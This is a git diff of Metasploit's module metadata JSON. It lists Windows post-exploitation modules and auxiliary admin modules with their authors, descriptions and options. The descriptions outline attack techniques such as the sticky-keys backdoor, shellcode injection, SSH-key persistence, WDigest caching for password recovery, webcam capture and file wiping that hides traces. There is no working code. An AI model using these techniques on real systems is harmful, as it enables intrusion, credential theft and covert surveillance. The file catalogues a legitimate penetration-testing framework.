"/modules/post/windows/manage/rollback_defender_signatures.rb", - "is_install_path": true, - "ref_name": "windows/manage/rollback_defender_signatures", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ROLLBACK", - "description": "Rollback Defender signatures" - }, - { - "name": "UPDATE", - "description": "Update Defender signatures" - } - ] - }, - "post_windows/manage/rpcapd_start": { - "name": "Windows Manage Remote Packet Capture Service Starter", - "fullname": "post/windows/manage/rpcapd_start", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/rpcapd_start.rb", - "is_install_path": true, - "ref_name": "windows/manage/rpcapd_start", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/run_as": { - "name": "Windows Manage Run Command As User", - "fullname": "post/windows/manage/run_as", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499" - ], - "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default, by setting\n CMDOUT to true output will be redirected to a temp file and read back in to\n display. By setting advanced option SETPASS to true, it will reset the user's\n password and then execute the command.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/run_as.rb", - "is_install_path": true, - "ref_name": "windows/manage/run_as", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/run_as_psh": { - "name": "Windows 'Run As' Using PowerShell", - "fullname": "post/windows/manage/run_as_psh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "p3nt4" - ], - "description": "This module will start a process as another user using PowerShell.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/run_as_psh.rb", - "is_install_path": true, - "ref_name": "windows/manage/run_as_psh", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/sdel": { - "name": "Windows Manage Safe Delete", - "fullname": "post/windows/manage/sdel", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "The goal of the module is to hinder the recovery of deleted files by overwriting\n its contents. This could be useful when you need to download some file on the victim\n machine and then delete it without leaving clues about its contents. Note that the script\n does not wipe the free disk space so temporary/sparse/encrypted/compressed files could\n not be overwritten. Note too that MTF entries are not overwritten so very small files\n could stay resident within the stream descriptor.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/sdel.rb", - "is_install_path": true, - "ref_name": "windows/manage/sdel", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/shellcode_inject": { - "name": "Windows Manage Memory Shellcode Injection Module", - "fullname": "post/windows/manage/shellcode_inject", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "phra " - ], - "description": "This module will inject into the memory of a process a specified shellcode.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/shellcode_inject.rb", - "is_install_path": true, - "ref_name": "windows/manage/shellcode_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/sshkey_persistence": { - "name": "SSH Key Persistence", - "fullname": "post/windows/manage/sshkey_persistence", - "aliases": [], - "rank": 400, - "disclosure_date": null, - "type": "post", - "author": [ - "Dean Welch " - ], - "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/sshkey_persistence.rb", - "is_install_path": true, - "ref_name": "windows/manage/sshkey_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/sticky_keys": { - "name": "Sticky Keys Persistence Module", - "fullname": "post/windows/manage/sticky_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "OJ Reeves" - ], - "description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.", - "references": [ - "URL-https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit", - "URL-https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/sticky_keys.rb", - "is_install_path": true, - "ref_name": "windows/manage/sticky_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ADD", - "description": "Add the backdoor to the target." - }, - { - "name": "REMOVE", - "description": "Remove the backdoor from the target." - } - ] - }, - "post_windows/manage/vmdk_mount": { - "name": "Windows Manage VMDK Mount Drive", - "fullname": "post/windows/manage/vmdk_mount", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage\n of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the\n device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with\n extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots\n or clones are linked from the file.", - "references": [ - "URL-http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/vmdk_mount.rb", - "is_install_path": true, - "ref_name": "windows/manage/vmdk_mount", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/vss": { - "name": "Windows Manage Volume Shadow Copies", - "fullname": "post/windows/manage/vss", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module will perform management actions for Volume Shadow Copies on the system. This is based on the VSSOwn\n Script originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.", - "references": [ - "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-02-23 16:27:12 +0000", - "path": "/modules/post/windows/manage/vss.rb", - "is_install_path": true, - "ref_name": "windows/manage/vss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "VSS_CREATE", - "description": "Create a new VSS copy" - }, - { - "name": "VSS_GET_INFO", - "description": "Get VSS information" - }, - { - "name": "VSS_LIST_COPIES", - "description": "List VSS copies" - }, - { - "name": "VSS_MOUNT", - "description": "Mount a VSS copy" - }, - { - "name": "VSS_SET_MAX_STORAGE_SIZE", - "description": "Set the VSS maximum storage size" - }, - { - "name": "VSS_UNMOUNT", - "description": "Unmount a VSS copy" - } - ] - }, - "post_windows/manage/wdigest_caching": { - "name": "Windows Post Manage WDigest Credential Caching", - "fullname": "post/windows/manage/wdigest_caching", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kostas Lintovois " - ], - "description": "On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables\n credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.\n Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/wdigest_caching.rb", - "is_install_path": true, - "ref_name": "windows/manage/wdigest_caching", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/webcam": { - "name": "Windows Manage Webcam", - "fullname": "post/windows/manage/webcam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will allow the user to detect installed webcams (with\n the LIST action) or take a snapshot (with the SNAPSHOT) action.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/webcam.rb", - "is_install_path": true, - "ref_name": "windows/manage/webcam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of webcams" - }, - { - "name": "SNAPSHOT", - "description": "Take a snapshot with the webcam" - } - ] - }, - "post_windows/recon/computer_browser_discovery": { - "name": "Windows Recon Computer Browser Discovery", - "fullname": "post/windows/recon/computer_browser_discovery", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module uses railgun to discover hostnames and IPs on the network.\n LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers),\n SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers),\n NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers),\n WINDOWS (all Windows hosts), or UNIX (all Unix hosts).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/recon/computer_browser_discovery.rb", - "is_install_path": true, - "ref_name": "windows/recon/computer_browser_discovery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/recon/outbound_ports": { - "name": "Windows Outbound-Filtering Rules", - "fullname": "post/windows/recon/outbound_ports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module makes some kind of TCP traceroute to get outbound-filtering rules.\n It will try to make a TCP connection to a certain public IP address (this IP\n does not need to be under your control) using different TTL incremental values.\n This way if you get an answer (ICMP TTL time exceeded packet) from a public IP\n device you can infer that the destination port is allowed. Setting STOP to\n true the module will stop as soon as you reach a public IP (this will generate\n less noise in the network).", - "references": [ - "URL-http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/recon/outbound_ports.rb", - "is_install_path": true, - "ref_name": "windows/recon/outbound_ports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_bss_list": { - "name": "Windows Gather Wireless BSS Info", - "fullname": "post/windows/wlan/wlan_bss_list", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module gathers information about the wireless Basic Service Sets\n available to the victim machine.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/wlan/wlan_bss_list.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_bss_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_current_connection": { - "name": "Windows Gather Wireless Current Connection Info", - "fullname": "post/windows/wlan/wlan_current_connection", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module gathers information about the current connection on each\n wireless lan interface on the target machine.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/wlan/wlan_current_connection.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_current_connection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_disconnect": { - "name": "Windows Disconnect Wireless Connection", - "fullname": "post/windows/wlan/wlan_disconnect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module disconnects the current wireless network connection\n on the specified interface.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/wlan/wlan_disconnect.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_disconnect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_probe_request": { - "name": "Windows Send Probe Request Packets", - "fullname": "post/windows/wlan/wlan_probe_request", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/wlan/wlan_probe_request.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_probe_request", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/wlan/wlan_profile": { - "name": "Windows Gather Wireless Profile", - "fullname": "post/windows/wlan/wlan_profile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts saved Wireless LAN profiles. It will also try to decrypt\n the network key material. Behavior is slightly different between OS versions\n when it comes to WPA. In Windows Vista/7 we will get the passphrase. In\n Windows XP we will get the PBKDF2 derived key.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/wlan/wlan_profile.rb", - "is_install_path": true, - "ref_name": "windows/wlan/wlan_profile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - } -} \ No newline at end of file From 22b80bbef3985000c3926e21ef5b06a1deb6e4c8 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 13 May 2025 13:52:14 +0000 Subject: [PATCH 21/27] Added modules_metadata_base --- db/modules_metadata_base.json | 254129 +++++++++++++++++++++++++++++++ 1 file changed, 254129 insertions(+) create mode 100644 db/modules_metadata_base.json diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json new file mode 100644 index 0000000000000..8a4984f1c3fad --- /dev/null +++ b/db/modules_metadata_base.json @@ -0,0 +1,254129 @@ +{ + "auxiliary_admin/2wire/xslt_password_reset": { + "name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability", + "fullname": "auxiliary/admin/2wire/xslt_password_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-08-15", + "type": "auxiliary", + "author": [ + "hkm ", + "Travis Phillips" + ], + "description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.", + "references": [ + "CVE-2007-4387", + "OSVDB-37667", + "BID-36075", + "URL-https://seclists.org/bugtraq/2007/Aug/225" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb", + "is_install_path": true, + "ref_name": "admin/2wire/xslt_password_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/android/google_play_store_uxss_xframe_rce": { + "name": "Android Browser RCE Through Google Play Store XFO", + "fullname": "auxiliary/admin/android/google_play_store_uxss_xframe_rce", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rafay Baloch", + "joev " + ], + "description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.", + "references": [ + "URL-http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/", + "URL-https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581", + "OSVDB-110664", + "CVE-2014-6041" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb", + "is_install_path": true, + "ref_name": "admin/android/google_play_store_uxss_xframe_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_admin/appletv/appletv_display_image": { + "name": "Apple TV Image Remote Control", + "fullname": "auxiliary/admin/appletv/appletv_display_image", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "0a29406d9794e4f9b30b3c5d6702c708", + "sinn3r " + ], + "description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.", + "references": [ + "URL-http://nto.github.io/AirPlay.html" + ], + "platform": "", + "arch": "", + "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb", + "is_install_path": true, + "ref_name": "admin/appletv/appletv_display_image", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/appletv/appletv_display_video": { + "name": "Apple TV Video Remote Control", + "fullname": "auxiliary/admin/appletv/appletv_display_video", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "0a29406d9794e4f9b30b3c5d6702c708", + "sinn3r " + ], + "description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.", + "references": [ + "URL-http://nto.github.io/AirPlay.html" + ], + "platform": "", + "arch": "", + "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb", + "is_install_path": true, + "ref_name": "admin/appletv/appletv_display_video", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/atg/atg_client": { + "name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client", + "fullname": "auxiliary/admin/atg/atg_client", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jon Hart " + ], + "description": "This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2015/01/22/the-internet-of-gas-station-tank-gauges/", + "URL-https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment", + "URL-https://github.com/sjhilt/GasPot", + "URL-https://github.com/mushorg/conpot", + "URL-https://www.veeder.com/us/automatic-tank-gauge-atg-consoles", + "URL-https://cdn.chipkin.com/files/liz/576013-635.pdf", + "URL-https://docs.veeder.com/gold/download.cfm?doc_id=6227" + ], + "platform": "", + "arch": "", + "rport": 10001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/atg/atg_client.rb", + "is_install_path": true, + "ref_name": "admin/atg/atg_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ALARM", + "description": "I30200 Sensor alarm history (untested)" + }, + { + "name": "ALARM_RESET", + "description": "IS00300 Remote alarm reset (untested)" + }, + { + "name": "CLEAR_RESET", + "description": "IS00200 Clear Reset Flag (untested)" + }, + { + "name": "DELIVERY", + "description": "I20200 Delivery report" + }, + { + "name": "INVENTORY", + "description": "200/I20100 In-tank inventory report" + }, + { + "name": "LEAK", + "description": "I20300 Leak report" + }, + { + "name": "RELAY", + "description": "I40600 Relay status (untested)" + }, + { + "name": "RESET", + "description": "IS00100 Reset (untested)" + }, + { + "name": "SENSOR", + "description": "I30100 Sensor status (untested)" + }, + { + "name": "SENSOR_DIAG", + "description": "IB0100 Sensor diagnostics (untested)" + }, + { + "name": "SET_TANK_NAME", + "description": "S602 set tank name (use TANK_NUMBER and TANK_NAME options)" + }, + { + "name": "SHIFT", + "description": "I20400 Shift report" + }, + { + "name": "STATUS", + "description": "I20500 In-tank status report" + }, + { + "name": "SYSTEM_STATUS", + "description": "I10100 System status report (untested)" + }, + { + "name": "TANK_ALARM", + "description": "I20600 Tank alarm history (untested)" + }, + { + "name": "TANK_DIAG", + "description": "IA0100 Tank diagnostics (untested)" + }, + { + "name": "VERSION", + "description": "Version information" + } + ] + }, + "auxiliary_admin/aws/aws_launch_instances": { + "name": "Launches Hosts in AWS", + "fullname": "auxiliary/admin/aws/aws_launch_instances", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Javier Godinez " + ], + "description": "This module will attempt to launch an AWS instances (hosts) in EC2.", + "references": [ + "URL-https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ", + "URL-https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb", + "is_install_path": true, + "ref_name": "admin/aws/aws_launch_instances", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/backupexec/dump": { + "name": "Veritas Backup Exec Windows Remote File Access", + "fullname": "auxiliary/admin/backupexec/dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm ", + "Unknown" + ], + "description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.", + "references": [ + "CVE-2005-2611", + "OSVDB-18695", + "BID-14551", + "URL-https://web.archive.org/web/20120227144337/http://www.fpns.net/willy/msbksrc.lzh" + ], + "platform": "", + "arch": "", + "rport": 10000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/backupexec/dump.rb", + "is_install_path": true, + "ref_name": "admin/backupexec/dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/backupexec/registry": { + "name": "Veritas Backup Exec Server Registry Access", + "fullname": "auxiliary/admin/backupexec/registry", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + 